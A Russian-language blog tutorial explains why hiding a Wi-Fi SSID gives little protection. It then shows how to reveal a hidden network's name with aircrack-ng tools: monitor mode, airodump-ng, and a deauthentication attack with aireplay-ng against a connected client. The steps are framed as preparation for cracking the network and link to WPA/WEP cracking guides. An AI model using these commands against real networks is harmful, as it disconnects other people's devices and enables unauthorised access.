Как узнать SSID скрытой точки доступа

В этой статье расскажу вам, как узнать SSID скрытой точки доступа. Это не сложный вопрос и его описания хватило бы несколько строк. Но на мой взгляд лучше один раз описать, как это делается. Чем по сто раз писать одно и тоже в комментариях (наболело).

По научному это называется – отключение широковещательной рассылки идентификатора сети. “Скрытие” SSID точки доступа входит в набор базовых механизмов защиты стандарта 802.11. К таким механизмам относятся:

• ограничение зоны распространения радиосигнала
• списки контроля доступа на основе списков MAC-адресов
• отключение широковещательной рассылки идентификатора сети
• изменение стандартных настроек
• защита точек доступа

Подробное описание остальных базовых механизмов защиты будет рассказано в следующих статьях. А сейчас, как всегда теория.

[ad name=»Responbl»]

Теория – Рассылка SSID

Теория взята из книги  “Безопасность беспроводных сетей“. Мне кажется, что это будет правильно. Чем писать отсебятину. Более того, авторами этой книги являются С.В. Гордейчик и В.В. Дубровин. Которые не нуждаются в представлении – их и так все знают.

В служебных фреймах Beacon и Probe Response точка доступа отправляет индентификатор сети и другие служебные данные. Именно эту информацию выводят стандартные утилиты подключения к беспроводной сети и многочисленные “стамблеры”. Стандартом предусмотрена и в большинстве точек доступа реализована возможность отключать широковещательную рассылку SSID. Этот режим обычно называется “Disable SSID Broadcast” или “No Guest Mode“. В результате в поле SSID во фреймах Beacon и Probe Response будет указываться пустая строка.

Такие сети не будут отображаться в утилитах типа Netstambler и не будут видны в списке доступных сетей стандартного беспроводного клиента. В результате может возникнуть ощущение, что таким образом удастся скрыть сеть от злоумышленника, который не знает ее SSID.

Но задача поиска сети по ее идентификатору остается нерешенной, и, поскольку она не реализуется точкой доступа, ее берут на себя станции беспроводной сети. Для этого клиенты рассылают в запросах Probe Request идентификаторы сетей, указанные в профиле подключения. Если точка доступа отвечает на такой фрейм, значит, ее SSID совпадает со значением, указанным в запросе, и можно приступать к процедуре подключения.

В результате злоумышленник, прослушивающий сеть в режиме мониторинга, получает возможность узнавать идентификатор сети. Существует большое количество утилит, работающих по такому принципу, например, популярный анализатор беспроводных сетей Kismet.

С их помощью довольно просто узнать идентификатор “скрытой” сети, если с ней работают клиенты. Кроме того, такая логика работы станции приводит к разглашению настроек профиля беспроводных подключений клиента, поскольку он вынужден рассылать SSID с конфигурированных станций.

Таким образом, прекращение широковещательной рассылки идентификатора сети не является серьезным средством защиты, разве что может снизить количество срабатываний системы обнаружения атак, связанных с попытками подключения совсем уж неумелых “хакеров”. Однако, поскольку большинство беспроводных клиентов рассылает SSID сети в запросах на подключение независимо от типа точки доступа, возможно, есть смысл использовать эту возможность.

Практика

С теорией ознакомились. Давайте выведем из нее главное условие для нашей практики – к АР должен быть подключен клиент! Если клиентов не будет, тогда не получится узнать SSID “скрытой” точки доступа.

Итак, загружаемся в BackTrack 5 R2. Открываем консоль. Переводим Wi-Fi клиента в режим монитора (monitor mode):

# airmon-ng start wlan1

Сканируем сети в радиусе действия:

# airodump-ng mon0

Видите в столбце “ESSID” не понятное название <lenght:  0>? Так вот – это и есть скрытая точка доступа (АР).

Теперь переключаемся на нее:

# airodump-ng -c 1 -w hide_AP --bssid BC:AE:C5:71:D3:17 mon0

Видим, что к точке доступа подключен один клиент с МАС-адресом (70:F1:A1:72:B4:25). Значит у нас должно все получится. Теперь открываем новое окно терминала (Ctrl+Shift+N).

[ad name=»Responbl»]

Здесь мы должны послать клиенту, от имени точки доступа (АР), пакет на деаутентификацию. Делается это следующей командой:

# aireplay-ng -0 1 -a BC:AE:C5:71:D3:17 -c 70:F1:A1:72:B4:25 mon0

• -0 – деаутентификация
• 1 – количество пакетов
• -a – MAC-адрес точки доступа
• -c – MAC-адрес клиента, к которому применяется деаутентификация

11:12:18  Waiting for beacon frame (BSSID: BC:AE:C5:71:D3:17) on channel 1
11:12:18  Sending 64 directed DeAuth. STMAC: [70:F1:A1:72:B4:25] [ 5| 6 ACKs]

После этого в первом окне терминала должна наблюдать следующая картина:

Как видите Wi-Fi сеть, SSID которой был раньше скрыт, теперь нам известен. После этого смело можно взламывать. Описывать взлом в этой статье не буду, так как считаю, что материала достаточно.

Взлом Wi-Fi сетей с шифрованием WPA/WPA2:

• Как взломать пароль WPA сети Wi-Fi с помощью Reaver

Взлом Wi-Fi сетей с шифрованием WEP:

• Взлом Wi-Fi сети (WEP) – часть 4
• Взлом Wi-Fi сети (WEP) – часть 3
• Взлом Wi-Fi сети (WEP) – часть 2
• Взлом Wi-Fi сети (WEP) – часть 1

Дополнительные материалы:

• Как установить reaver и aircrack-ng на Ubuntu 12.04
• Установка reaver в BackTrack 5 R1
• Установка Wi-Fi драйвера на Debian Linux